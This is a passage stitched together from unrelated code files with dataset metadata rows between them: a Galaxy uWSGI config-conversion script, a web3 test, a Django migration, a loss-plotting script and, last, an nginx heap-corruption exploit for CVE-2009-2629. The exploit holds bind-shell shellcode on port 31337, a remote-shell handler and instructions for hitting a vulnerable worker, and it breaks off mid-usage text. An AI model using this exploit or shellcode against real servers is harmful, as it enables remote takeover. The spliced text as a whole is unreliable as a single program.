}),
('processes', {
'desc': """Number of web server (worker) processes to fork after the application has loaded. If this is set to greater than 1, thunder-lock likely should be enabled below.""",
'default': 1,
'type': 'int',
}),
('threads', {
'desc': """Number of threads for each web server process.""",
'default': 4,
'type': 'int',
}),
('offload-threads', {
'desc': """Number of threads for serving static content and handling internal routing requests.""",
'default': 2,
'type': 'int',
}),
('static-map.1', {
'key': 'static-map',
'desc': """Mapping to serve static content.""",
'default': '/static=static',
'type': 'str',
}),
('static-map.2', {
'key': 'static-map',
'desc': """Mapping to serve the favicon.""",
'default': '/favicon.ico=static/favicon.ico',
'type': 'str',
}),
('static-safe', {
'key': 'static-safe',
'desc': """Allow serving certain assets out of `client`. Most modern Galaxy interfaces bundle all of this, but some older pages still serve these via symlink, requiring this rule.""",
'default': 'client/src/assets',
'type': 'str',
}),
('master', {
'desc': """Enable the master process manager. Disabled by default for maximum compatibility with CTRL+C, but should be enabled for use with --daemon and/or production deployments.""",
'default': False,
'type': 'bool',
}),
('virtualenv', {
'desc': """Path to the application's Python virtual environment. If using Conda for Galaxy's framework dependencies (not tools!), do not set this.""",
'default': '.venv',
'type': 'str',
}),
('pythonpath', {
'desc': """Path to the application's Python library.""",
'default': 'lib',
'type': 'str',
}),
('module', {
'desc': """The entry point which returns the web application (e.g. Galaxy, Reports, etc.) that you are loading.""",
'default': '$uwsgi_module',
'type': 'str',
}),
('#mount', {
'desc': """Mount the web application (e.g. Galaxy, Reports, etc.) at the given URL prefix. Cannot be used together with 'module:' above.""",
'default': '/galaxy=$uwsgi_module',
'type': 'str',
}),
('manage-script-name', {
'desc': """Make uWSGI rewrite PATH_INFO and SCRIPT_NAME according to mount-points. Set this to true if a URL prefix is used.""",
'default': False,
'type': 'bool',
}),
('thunder-lock', {
'desc': """It is usually a good idea to set this to ``true`` if processes is greater than 1.""",
'default': False,
'type': 'bool',
}),
('die-on-term', {
'desc': """Cause uWSGI to respect the traditional behavior of dying on SIGTERM (its default is to brutally reload workers)""",
'default': True,
'type': 'bool',
}),
('hook-master-start.1', {
'key': 'hook-master-start',
'desc': """Cause uWSGI to gracefully reload workers and mules upon receipt of SIGINT (its default is to brutally kill workers)""",
'default': 'unix_signal:2 gracefully_kill_them_all',
'type': 'str',
}),
('hook-master-start.2', {
'key': 'hook-master-start',
'desc': """Cause uWSGI to gracefully reload workers and mules upon receipt of SIGTERM (its default is to brutally kill workers)""",
'default': 'unix_signal:15 gracefully_kill_them_all',
'type': 'str',
}),
('py-call-osafterfork', {
'desc': """Feature necessary for proper mule signal handling on Python versions below 3.7.2. The default is set to false to prevent a runtime error under Python 3.7.2 and newer (see https://github.com/unbit/uwsgi/issues/1978).""",
'default': False,
'type': 'bool',
}),
('enable-threads', {
'desc': """Ensure application threads will run if `threads` is unset.""",
'default': True,
'type': 'bool',
}),
('umask', {
'desc': """uWSGI default umask. On some systems uWSGI has a default umask of 000, for Galaxy a somewhat safer default is chosen. If Galaxy submits jobs as real user then all users needs to be able to read the files, i.e. the umask needs to be '022' or the Galaxy users need to be in the same group as the Galaxy system user""",
'default': '027',
'type': 'str',
}),
# ('route-uri', {
# 'default': '^/proxy/ goto:proxy'
# }),
# ('route', {
# 'default': '.* last:'
# }),
# ('route-label', {
# 'default': 'proxy'
# }),
# ('route-run', {
# 'default': 'rpcvar:TARGET_HOST galaxy_dynamic_proxy_mapper ${HTTP_HOST} ${cookie[galaxysession]}'
# }),
# ('route-run', {
# 'default': "['log:Proxy ${HTTP_HOST} to ${TARGET_HOST}', 'httpdumb:${TARGET_HOST}']",
# }),
# ('http-raw-body', {
# 'default': True
# }),
])
SHED_ONLY_UWSGI_OPTIONS = [('cron', {
'desc': """Task for rebuilding Toolshed search indexes using the uWSGI cron-like interface.""",
'default': "0 -1 -1 -1 -1 python scripts/tool_shed/build_ts_whoosh_index.py -c config/tool_shed.yml --config-section tool_shed",
'type': 'str',
})]
DROP_OPTION_VALUE = object()
class _OptionAction:
def converted(self, args, app_desc, key, value):
pass
def lint(self, args, app_desc, key, value):
pass
class _DeprecatedAction(_OptionAction):
def lint(self, args, app_desc, key, value):
print(f"Option [{key}] has been deprecated, this will likely be dropped in future releases of Galaxy.")
class _DeprecatedAndDroppedAction(_OptionAction):
def converted(self, args, app_desc, key, value):
print(f"Option [{key}] has been deprecated and dropped. It is not included in converted configuration.")
return DROP_OPTION_VALUE
def lint(self, args, app_desc, key, value):
print(f"Option [{key}] has been deprecated. Option should be dropped without replacement.")
class _PasteAppFactoryAction(_OptionAction):
def converted(self, args, app_desc, key, value):
if value not in app_desc.expected_app_factories:
raise Exception(f"Ending convert process - unknown paste factory encountered [{value}]")
return DROP_OPTION_VALUE
def lint(self, args, app_desc, key, value):
if value not in app_desc.expected_app_factories:
print(f"Problem - unknown paste app factory encountered [{value}]")
class _ProductionUnsafe(_OptionAction):
def __init__(self, unsafe_value):
self.unsafe_value = unsafe_value
def lint(self, args, app_desc, key, value):
if str(value).lower() == str(self.unsafe_value).lower():
template = "Problem - option [%s] should not be set to [%s] in production environments - it is unsafe."
message = template % (key, value)
print(message)
class _ProductionPerformance(_OptionAction):
def lint(self, args, app_desc, key, value):
template = "Problem - option [%s] should not be set to [%s] in production environments - it may cause performance issues or instability."
message = template % (key, value)
print(message)
class _HandleFilterWithAction(_OptionAction):
def converted(self, args, app_desc, key, value):
print("filter-with converted to prefixed module load of uwsgi module, dropping from converted configuration")
return DROP_OPTION_VALUE
class _RenameAction(_OptionAction):
def __init__(self, new_name):
self.new_name = new_name
def converted(self, args, app_desc, key, value):
return (self.new_name, value)
def lint(self, args, app_desc, key, value):
template = "Problem - option [%s] has been renamed (possibly with slightly different behavior) to [%s]."
message = template % (key, self.new_name)
print(message)
OPTION_ACTIONS = {
'use_beaker_session': _DeprecatedAndDroppedAction(),
'use_interactive': _DeprecatedAndDroppedAction(),
'session_type': _DeprecatedAndDroppedAction(),
'session_data_dir': _DeprecatedAndDroppedAction(),
'session_key': _DeprecatedAndDroppedAction(),
'session_secret': _DeprecatedAndDroppedAction(),
'paste.app_factory': _PasteAppFactoryAction(),
'filter-with': _HandleFilterWithAction(),
'debug': _ProductionUnsafe(True),
'serve_xss_vulnerable_mimetypes': _ProductionUnsafe(True),
'use_printdebug': _ProductionUnsafe(True),
'id_secret': _ProductionUnsafe('USING THE DEFAULT IS NOT SECURE!'),
'master_api_key': _ProductionUnsafe('changethis'),
'external_service_type_config_file': _DeprecatedAndDroppedAction(),
'external_service_type_path': _DeprecatedAndDroppedAction(),
'enable_sequencer_communication': _DeprecatedAndDroppedAction(),
'run_workflow_toolform_upgrade': _DeprecatedAndDroppedAction(),
# Next 4 were from library search which is no longer available.
'enable_lucene_library_search': _DeprecatedAndDroppedAction(),
'fulltext_max_size': _DeprecatedAndDroppedAction(),
'fulltext_noindex_filetypes': _DeprecatedAndDroppedAction(),
'fulltext_url': _DeprecatedAndDroppedAction(),
'enable_beta_job_managers': _DeprecatedAndDroppedAction(),
'enable_legacy_sample_tracking_api': _DeprecatedAction(),
'enable_new_user_preferences': _DeprecatedAndDroppedAction(),
'force_beta_workflow_scheduled_for_collections': _DeprecatedAction(),
'force_beta_workflow_scheduled_min_steps': _DeprecatedAction(),
'history_local_serial_workflow_scheduling': _ProductionPerformance(),
'allow_library_path_paste': _RenameAction("allow_path_paste"),
'trust_ipython_notebook_conversion': _RenameAction("trust_jupyter_notebook_conversion"),
'enable_beta_tool_command_isolation': _DeprecatedAndDroppedAction(),
'enable_beta_ts_api_install': _DeprecatedAndDroppedAction(),
'single_user': _ProductionUnsafe(True),
'tool_submission_burst_threads': _DeprecatedAndDroppedAction(),
'tool_submission_burst_at': _DeprecatedAndDroppedAction(),
'toolform_upgrade': _DeprecatedAndDroppedAction(),
'enable_beta_mulled_containers': _DeprecatedAndDroppedAction(),
'enable_communication_server': _DeprecatedAndDroppedAction(),
'communication_server_host': _DeprecatedAndDroppedAction(),
'communication_server_port': _DeprecatedAndDroppedAction(),
'persistent_communication_rooms': _DeprecatedAndDroppedAction(),
'legacy_eager_objectstore_initialization': _DeprecatedAndDroppedAction(),
}
class App(NamedTuple):
config_paths: List[str]
default_port: str
expected_app_factories: List[str]
destination: str
schema_path: str
uwsgi_module: str
@property
def app_name(self):
return os.path.splitext(os.path.basename(self.destination))[0]
@property
def sample_destination(self):
return self.destination + ".sample"
@property
def schema(self):
return AppSchema(self.schema_path, self.app_name)
class OptionValue(NamedTuple):
name: str
value: Any
option: Any
GALAXY_APP = App(
["universe_wsgi.ini", "config/galaxy.ini"],
"8080",
["galaxy.web.buildapp:app_factory"], # TODO: Galaxy could call factory a few different things and they'd all be fine.
"config/galaxy.yml",
GALAXY_CONFIG_SCHEMA_PATH,
'galaxy.webapps.galaxy.buildapp:uwsgi_app()',
)
SHED_APP = App(
["tool_shed_wsgi.ini", "config/tool_shed.ini"],
"9009",
["tool_shed.webapp.buildapp:app_factory"],
"config/tool_shed.yml",
"lib/tool_shed/webapp/config_schema.yml",
'tool_shed.webapp.buildapp:uwsgi_app()',
)
REPORTS_APP = App(
["reports_wsgi.ini", "config/reports.ini"],
"9001",
["galaxy.webapps.reports.buildapp:app_factory"],
"config/reports.yml",
"lib/galaxy/webapps/reports/config_schema.yml",
'galaxy.webapps.reports.buildapp:uwsgi_app()',
)
APPS = {"galaxy": GALAXY_APP, "tool_shed": SHED_APP, "reports": REPORTS_APP}
def main(argv=None):
"""Entry point for conversion process."""
if argv is None:
argv = sys.argv[1:]
args = _arg_parser().parse_args(argv)
app_name = args.app
app_desc = APPS.get(app_name)
action = args.action
action_func = ACTIONS[action]
action_func(args, app_desc)
def _arg_parser():
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument('action', metavar='ACTION', type=str,
choices=list(ACTIONS.keys()),
help='action to perform')
parser.add_argument('app', metavar='APP', type=str, nargs="?",
help=APP_DESCRIPTION)
parser.add_argument('--add-comments', default=False, action="store_true")
parser.add_argument('--dry-run', default=False, action="store_true",
help=DRY_RUN_DESCRIPTION)
parser.add_argument('--galaxy_root', default=".", type=str)
return parser
def _to_rst(args, app_desc, heading_level="~"):
rst = StringIO()
schema = app_desc.schema
for key, value in schema.app_schema.items():
default = None if "default" not in value else value["default"]
if default is True:
default = "true"
elif default is False:
default = "false"
option = schema.get_app_option(key)
option_value = OptionValue(key, default, option)
_write_option_rst(args, rst, key, heading_level, option_value)
print(rst.getvalue())
def _write_option_rst(args, rst, key, heading_level, option_value):
title = f"``{key}``"
heading = heading_level * len(title)
rst.write(f"{heading}\n{title}\n{heading}\n\n")
option, value = _parse_option_value(option_value)
desc = _get_option_desc(option)
rst.write(":Description:\n")
# Wrap and indent desc, replacing whitespaces with a space, except
# for double newlines which are replaced with a single newline.
rst.write("\n".join("\n".join(RST_DESCRIPTION_WRAPPER.wrap(_)) for _ in desc.split("\n\n")) + "\n")
type = option.get("type", None)
default = option.get("default", "*null*")
if default is True:
default = "true"
elif default is False:
default = "false"
elif default == "":
default = '""'
rst.write(f":Default: ``{default}``\n")
if type:
rst.write(f":Type: {type}\n")
rst.write("\n\n")
def _build_uwsgi_schema(args, app_desc):
req = requests.get('https://raw.githubusercontent.com/unbit/uwsgi-docs/master/Options.rst')
rst_options = req.text
last_line = None
current_opt = None
options = {}
option = None
for line in rst_options.splitlines():
line = line.strip()
dots = "*" * len(line)
if line and (line == dots):
current_opt = last_line
option = {
'type': 'any',
}
options[current_opt] = option
if line.startswith("``parser``"):
parser = line.split(":", 1)[1].strip()
if parser == "uwsgi_opt_set_int":
option["type"] = "int"
# TODO: disptch on parser...
elif line.startswith("``help``"):
option["desc"] = line.split(":", 1)[1]
last_line = line
schema = {
"type": "map",
"desc": "uwsgi definition, see https://uwsgi-docs.readthedocs.io/en/latest/Options.html",
"mapping": options
}
path = os.path.join(args.galaxy_root, UWSGI_SCHEMA_PATH)
contents = ordered_dump(schema)
_write_to_file(args, contents, path)
def _find_config(args, app_desc):
path = os.path.join(args.galaxy_root, app_desc.destination)
if not os.path.exists(path):
path = None
for possible_ini_config_rel in app_desc.config_paths:
possible_ini_config = os.path.join(args.galaxy_root, possible_ini_config_rel)
if os.path.exists(possible_ini_config):
path = possible_ini_config
if path is None:
_warn(USING_SAMPLE_MESSAGE % path)
path = os.path.join(args.galaxy_root, app_desc.sample_destination)
return path
def _find_app_options(app_desc, path):
"""Load app (as opposed to server) options from specified path.
Supplied ``path`` may be either YAML or ini file.
"""
if _is_ini(path):
p = nice_config_parser(path)
app_items = _find_app_options_from_config_parser(p)
else:
raw_config = _order_load_path(path)
app_items = raw_config.get(app_desc.app_name, None) or {}
return app_items
def _find_app_options_from_config_parser(p):
if not p.has_section("app:main"):
_warn(NO_APP_MAIN_MESSAGE)
app_items = {}
else:
app_items = dict(p.items("app:main"))
return app_items
def _lint(args, app_desc):
path = _find_config(args, app_desc)
if not os.path.exists(path):
raise Exception(f"Expected configuration file [{path}] not found.")
app_items = _find_app_options(app_desc, path)
for key, value in app_items.items():
option_action = OPTION_ACTIONS.get(key)
if option_action is not None:
option_action.lint(args, app_desc, key, value)
def _validate(args, app_desc):
if Core is None:
raise Exception("Cannot validate file, pykwalify is not installed.")
path = _find_config(args, app_desc)
# Allow empty mapping (not allowed by pykwalify)
raw_config = _order_load_path(path)
if raw_config.get(app_desc.app_name) is None:
raw_config[app_desc.app_name] = {}
# Rewrite the file any way to merge any duplicate keys
with tempfile.NamedTemporaryFile('w', delete=False, suffix=".yml") as config_p:
ordered_dump(raw_config, config_p)
def _clean(p, k, v):
return k not in ['reloadable', 'path_resolves_to', 'per_host']
clean_schema = remap(app_desc.schema.raw_schema, _clean)
with tempfile.NamedTemporaryFile('w', suffix=".yml") as fp:
ordered_dump(clean_schema, fp)
fp.flush()
c = Core(
source_file=config_p.name,
schema_files=[fp.name],
)
os.remove(config_p.name)
c.validate()
class PrefixFilter:
def __init__(self, name, prefix):
self.name = name
self.prefix = prefix
class GzipFilter:
def __init__(self, name):
self.name = name
def _run_conversion(args, app_desc):
ini_config = _find_config(args, app_desc)
if ini_config and not _is_ini(ini_config):
_warn(f"Cannot convert YAML file {ini_config}, this option is only for ini config files.")
sys.exit(1)
elif not ini_config:
_warn("Failed to find a config to convert - exiting without changes.")
sys.exit(1)
p = nice_config_parser(ini_config)
server_section = None
filters = {}
for section in p.sections():
if section.startswith("server:"):
if server_section:
_warn(EXTRA_SERVER_MESSAGE % (server_section, section))
else:
server_section = section
if section.startswith("filter:"):
filter_name = section[len("filter:"):]
filter_type = p.get(section, "use")
if filter_type is None:
MISSING_FILTER_TYPE_MESSAGE
message = EXTRA_SERVER_MESSAGE % section
_warn(message)
continue
if filter_type == "egg:PasteDeploy#prefix":
prefix = p.get(section, "prefix")
filters[filter_name] = PrefixFilter(filter_name, prefix)
elif filter_type == "egg:Paste#gzip":
filters[filter_name] = GzipFilter(filter_name)
else:
message = UNHANDLED_FILTER_TYPE_MESSAGE % (filter_type, section)
_warn(message)
continue
if not server_section:
_warn("No server section found, using default uwsgi server definition.")
server_config = {}
else:
server_config = dict(p.items(server_section))
app_items = _find_app_options_from_config_parser(p)
applied_filters = []
if filters:
for key, value in app_items.items():
if key == "filter-with":
if value in filters:
applied_filters.append(filters[value])
else:
_warn(f"Unknown filter found [{value}], exiting...")
sys.exit(1)
uwsgi_dict = _server_paste_to_uwsgi(app_desc, server_config, applied_filters)
app_dict = {}
schema = app_desc.schema
for key, value in app_items.items():
if key in ["__file__", "here"]:
continue
if key in OPTION_ACTIONS:
option_action = OPTION_ACTIONS.get(key)
new_value = option_action.converted(args, app_desc, key, value)
if new_value:
if isinstance(new_value, tuple):
key, value = new_value
else:
value = new_value
if value is DROP_OPTION_VALUE:
continue
option = schema.get_app_option(key)
if option["unknown_option"]:
_warn(UNKNOWN_OPTION_MESSAGE % key)
option_value = OptionValue(key, value, option)
app_dict[key] = option_value
f = StringIO()
_write_section(args, f, "uwsgi", uwsgi_dict, uwsgi_hack=True)
_write_section(args, f, app_desc.app_name, app_dict)
destination = os.path.join(args.galaxy_root, app_desc.destination)
_replace_file(args, f, app_desc, ini_config, destination)
def _is_ini(path):
return path.endswith(".ini") or path.endswith(".ini.sample")
def _replace_file(args, f, app_desc, from_path, to_path):
_write_to_file(args, f, to_path)
backup_path = f"{from_path}.backup"
print(f"Moving [{from_path}] to [{backup_path}]")
if args.dry_run:
print("... skipping because --dry-run is enabled.")
else:
shutil.move(from_path, backup_path)
def _build_sample_yaml(args, app_desc):
if app_desc.app_name in ["tool_shed"]:
UWSGI_OPTIONS.update(SHED_ONLY_UWSGI_OPTIONS)
schema = app_desc.schema
f = StringIO()
for value in UWSGI_OPTIONS.values():
for field in ["desc", "default"]:
if field not in value:
continue
field_value = value[field]
if not isinstance(field_value, str):
continue
new_field_value = string.Template(field_value).safe_substitute(**{
'default_port': str(app_desc.default_port),
'app_name': app_desc.app_name,
'uwsgi_module': app_desc.uwsgi_module,
})
value[field] = new_field_value
description = getattr(schema, "description", None)
if description:
description = description.lstrip()
as_comment = "\n".join(f"# {line}" for line in description.split("\n")) + "\n"
f.write(as_comment)
_write_sample_section(args, f, 'uwsgi', Schema(UWSGI_OPTIONS), as_comment=False, uwsgi_hack=True)
_write_sample_section(args, f, app_desc.app_name, schema)
destination = os.path.join(args.galaxy_root, app_desc.sample_destination)
_write_to_file(args, f, destination)
def _write_to_file(args, f, path):
if hasattr(f, "getvalue"):
contents = f.getvalue()
else:
contents = f
if args.dry_run:
contents_indented = "\n".join(f" |{line}" for line in contents.splitlines())
print(f"Overwriting {path} with the following contents:\n{contents_indented}")
print("... skipping because --dry-run is enabled.")
else:
print(f"Overwriting {path}")
safe_makedirs(os.path.dirname(path))
with open(path, "w") as to_f:
to_f.write(contents)
def _order_load_path(path):
"""Load (with ``_ordered_load``) on specified path (a YAML file)."""
with open(path) as f:
# Allow empty mapping (not allowed by pykwalify)
raw_config = ordered_load(f, merge_duplicate_keys=True)
return raw_config
def _write_sample_section(args, f, section_header, schema, as_comment=True, uwsgi_hack=False):
_write_header(f, section_header)
for key, value in schema.app_schema.items():
default = None if "default" not in value else value["default"]
option = schema.get_app_option(key)
option_value = OptionValue(key, default, option)
# support uWSGI "dumb YAML parser" (unbit/uwsgi#863)
key = option.get('key', key)
_write_option(args, f, key, option_value, as_comment=as_comment, uwsgi_hack=uwsgi_hack)
def _write_section(args, f, section_header, section_dict, uwsgi_hack=False):
_write_header(f, section_header)
for key, option_value in section_dict.items():
_write_option(args, f, key, option_value, uwsgi_hack=uwsgi_hack)
def _write_header(f, section_header):
f.write(f"{section_header}:\n\n")
def _write_option(args, f, key, option_value, as_comment=False, uwsgi_hack=False):
option, value = _parse_option_value(option_value)
desc = _get_option_desc(option)
comment = ""
if desc and args.add_comments:
# Wrap and comment desc, replacing whitespaces with a space, except
# for double newlines which are replaced with a single newline.
comment += "\n".join("\n".join(YAML_COMMENT_WRAPPER.wrap(_)) for _ in desc.split("\n\n")) + "\n"
as_comment_str = "#" if as_comment else ""
if uwsgi_hack:
if option.get("type", "str") == "bool":
value = str(value).lower()
key_val_str = f"{key}: {value}"
else:
key_val_str = yaml.dump({key: value}, width=float("inf")).lstrip("{").rstrip("\n}")
lines = f"{comment}{as_comment_str}{key_val_str}"
lines_idented = "\n".join(f" {line}" for line in lines.split("\n"))
f.write(f"{lines_idented}\n\n")
def _parse_option_value(option_value):
if isinstance(option_value, OptionValue):
option = option_value.option
value = option_value.value
# Hack to get nicer YAML values during conversion
if option.get("type", "str") == "bool":
value = str(value).lower() == "true"
elif option.get("type", "str") == "int":
value = int(value)
else:
value = option_value
option = OPTION_DEFAULTS
return option, value
def _server_paste_to_uwsgi(app_desc, server_config, applied_filters):
uwsgi_dict = {}
port = server_config.get("port", app_desc.default_port)
host = server_config.get("host", "127.0.0.1")
if server_config.get("use", "egg:Paste#http") != "egg:Paste#http":
raise Exception("Unhandled paste server 'use' value [%s], file must be manually migrate.")
uwsgi_dict["http"] = f"{host}:{port}"
# default changing from 10 to 8
uwsgi_dict["threads"] = int(server_config.get("threadpool_workers", 8))
# required for static...
uwsgi_dict["http-raw-body"] = True
uwsgi_dict["offload-threads"] = 8
# Handle paste filters during conversion.
prefix = None
for applied_filter in applied_filters:
if isinstance(applied_filter, PrefixFilter):
prefix = applied_filter.prefix
break
elif isinstance(applied_filter, GzipFilter):
uwsgi_dict["http-auto-gzip"] = True
if prefix:
uwsgi_dict["mount"] = f"{prefix}={app_desc.uwsgi_module}"
uwsgi_dict["manage-script-name"] = True
else:
uwsgi_dict["module"] = app_desc.uwsgi_module
return uwsgi_dict
def _warn(message):
print(f"WARNING: {message}")
def _get_option_desc(option):
desc = option["desc"]
parent_dir = option.get("path_resolves_to")
if parent_dir:
path_resolves = f"The value of this option will be resolved with respect to <{parent_dir}>."
return f"{desc}\n{path_resolves}" if desc else path_resolves
return desc
ACTIONS = {
"convert": _run_conversion,
"build_sample_yaml": _build_sample_yaml,
"validate": _validate,
"lint": _lint,
"build_uwsgi_yaml": _build_uwsgi_schema,
"build_rst": _to_rst,
}
if __name__ == '__main__':
main()
| 37.070743 | 335 | 0.651486 |
4a2252420746a170f170b96ea1728172c00445a9 | 562 | py | Python | tests/core/testing-module/test_testing_mine.py | pjryan93/web3.py | e066452a7b0e78d6cb8a9462532d169de901ef99 | [
"MIT"
] | 326 | 2016-04-29T21:51:06.000Z | 2022-03-31T03:20:54.000Z | tests/core/testing-module/test_testing_mine.py | pjryan93/web3.py | e066452a7b0e78d6cb8a9462532d169de901ef99 | [
"MIT"
] | 283 | 2016-04-15T16:41:31.000Z | 2017-11-28T16:41:36.000Z | tests/core/testing-module/test_testing_mine.py | pjryan93/web3.py | e066452a7b0e78d6cb8a9462532d169de901ef99 | [
"MIT"
] | 146 | 2016-04-14T16:27:54.000Z | 2021-10-03T13:31:07.000Z | def test_testing_mine_single_block(web3):
web3.testing.mine()
before_mining_block = web3.eth.getBlock("latest")
web3.testing.mine()
after_mining_block = web3.eth.getBlock("latest")
assert after_mining_block['number'] - before_mining_block['number'] == 1
def test_testing_mine_multiple_blocks(web3):
web3.testing.mine()
before_mining_block = web3.eth.getBlock("latest")
web3.testing.mine(5)
after_mining_block = web3.eth.getBlock("latest")
assert after_mining_block['number'] - before_mining_block['number'] == 5
| 24.434783 | 76 | 0.725979 |
4a2252b18cda01ae784a7a8137bb4a8c0f912163 | 1,108 | py | Python | python/cm/migrations/0044_auto_20200115_1058.py | AKhodus/adcm | 98dbf22af3f1c6afa94505e9acaff0ac4088a602 | [
"Apache-2.0"
] | 16 | 2019-11-28T18:05:21.000Z | 2021-12-08T18:09:18.000Z | python/cm/migrations/0044_auto_20200115_1058.py | AKhodus/adcm | 98dbf22af3f1c6afa94505e9acaff0ac4088a602 | [
"Apache-2.0"
] | 1,127 | 2019-11-29T08:57:25.000Z | 2022-03-31T20:21:32.000Z | python/cm/migrations/0044_auto_20200115_1058.py | AKhodus/adcm | 98dbf22af3f1c6afa94505e9acaff0ac4088a602 | [
"Apache-2.0"
] | 10 | 2019-11-28T18:05:06.000Z | 2022-01-13T06:16:40.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by Django 2.2.9 on 2020-01-15 10:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cm', '0043_auto_20200109_1600'),
]
operations = [
migrations.AddField(
model_name='action',
name='allow_to_terminate',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='stageaction',
name='allow_to_terminate',
field=models.BooleanField(default=True),
),
]
| 31.657143 | 74 | 0.675993 |
4a22538efb683f33e27cff8de2582765825a9b9f | 364 | py | Python | AITRexRush/Algorithm_1/VisLoss.py | 2360673637/AIGames | 7d149cc2cff8fa626ee1c9e1ad7c39e1a724a5bb | [
"MIT"
] | 2 | 2019-03-23T13:58:34.000Z | 2019-03-23T13:59:07.000Z | AITRexRush/Algorithm_1/VisLoss.py | 2360673637/AIGames | 7d149cc2cff8fa626ee1c9e1ad7c39e1a724a5bb | [
"MIT"
] | null | null | null | AITRexRush/Algorithm_1/VisLoss.py | 2360673637/AIGames | 7d149cc2cff8fa626ee1c9e1ad7c39e1a724a5bb | [
"MIT"
] | 1 | 2018-10-25T07:51:52.000Z | 2018-10-25T07:51:52.000Z | # Loss可视化
# 作者: Charles
# 公众号: Charles的皮卡丘
import pickle
from matplotlib import pyplot as plt
with open('./logger/loss.pkl', 'rb') as f:
loss_dict = pickle.load(f)
times = []
losses = []
for time, loss in loss_dict.items():
times.append(time)
losses.append(loss)
plt.title('Loss trend')
plt.xlabel('Time')
plt.ylabel('Loss')
plt.plot(times, losses)
plt.show() | 19.157895 | 42 | 0.703297 |
4a225510a2083489b5b4a196ea4848288cb81e65 | 7,299 | py | Python | ngix.py | CodingLi/test2 | 0e5c0047ee6cbc96e66a2e96fe32477ffb8a8a08 | [
"Apache-2.0"
] | null | null | null | ngix.py | CodingLi/test2 | 0e5c0047ee6cbc96e66a2e96fe32477ffb8a8a08 | [
"Apache-2.0"
] | null | null | null | ngix.py | CodingLi/test2 | 0e5c0047ee6cbc96e66a2e96fe32477ffb8a8a08 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Exploit Title: nginx heap corruption
# Date: 08/26/2010
# Author: aaron conole <[email protected]>
# Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz
# Version: <= 0.6.38, <= 0.7.61
# Tested on: BT4R1 running nginx 0.6.38 locally
# CVE: 2009-2629
#
# note: this was written and tested against BT4. This means it's an
# intel x86 setup (ie: offsets for 32-bit machine, etc.). YMMV
# also - only tested successfully against nginx 0.6.38
# you'll definitely need to modify against other versions
#
# you'll need to know where the offset is going to land, and what the pad is
# from that point to when you've tained execution flow.
#
# A quick way to find out just for verification would be to launch nginx,
# attach GDB to the worker and target it with the exploit, setting the offset
# to 0, or some other arbitrary value. It should crash on a piece of code which
# resembles:
# if (ctx->offset)
#
# At that point, merely dump the *r; capture the value for the data pointer
# (it'll be the one with "GET //../Aa0") and add 131 to it (decimal 131 to the
# hex pointer value). That should give you a good area to test with. You might
# want to use the range at that point and set the last octet to 00.
#
# NOTE: you'll need a configuration with merge_slashes enabled. I haven't yet
# found a "magic" combination that would cause the state machine to do
# what I want to make the bug trigger. Once I do, you can bet BUG will be
# replaced.
#Basically, on BT4:
#- compile
#- edit the configuration to enable merge slashes (just insert a line above the sendpage / sendfile config option "merge_slashes off;")
#- Launch nginx, and attach GDB to the worker
#- Send the exploit at it with offset 0x11111111
#- When the worker gets a sigsegv, it will be on a line which looks like "if (ctx->offset)", at that point type "p *r"
#- In the r data structure will be a few different fields, one which is a buffer that contains "GET //../Aa0Aa1Aa2..". This buffer has an address (lets say 0x8c1d32f).
#- Save off this address, and detach from the worker. A new one will spawn (the "manager" process will keep it going).
#- At this point, rerun the exploit, setting the offset to 0x8c1d300 and adding the -b flag
#- In a minute or two, you should be given the shell.
import os
import sys
import socket
import select
import struct
import time
import urllib
REQUEST_METHOD='GET '
# NOTE - this is a 32-bit null pointer. A 64-bit version would be 8-bytes (but take care to re-verify the structures)
NULLPTR='\x00\x00\x00\x00'
# NOTE - this shellcode was shamelessly stolen from the www
# port 31337 bindshell for /bin/sh
SHELL='\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80'
# Why did I write this up this way? Because given enough time, I think I can
# find a proper set of state change which can give me the same effect (ie: ../
# appearing as the 3rd, 4th, and 5th characters) at a later date.
# That's all controlled by the complex uri parsing bit, though.
DOUBLE_SLASH='//../'
BUG=DOUBLE_SLASH
# taken from the metasploit pattern_create.rb
PATTERN='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4'
def connect_socket(host,port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect( (host, port) )
except:
return 0
#sock.setblocking(0)
return sock
def handle_connection(sock):
while(1):
r, w, e = select.select( [sock, sys.stdin],
[],
[sock, sys.stdin] )
for s in r:
if s == sys.stdin:
buf = sys.stdin.readline()
try:
if buf != '':
sock.send(buf)
except:
print "Xon close?"
return 0
elif s == sock:
try:
buf = sock.recv(100)
except:
print "Xon close?"
return 0
if buf != '':
sys.stdout.write(buf)
def main(argv):
argc = len(argv)
if argc < 4:
print "usage: %s <host> <port> <ctx_addr> [-b]" % (argv[0])
print "[*] exploit for nginx <= 0.6.38 CVE 2009-2629"
print "[*] host = the remote host name"
print "[*] port = the remote port"
print "[*] ctx_addr is where the context address should begin at"
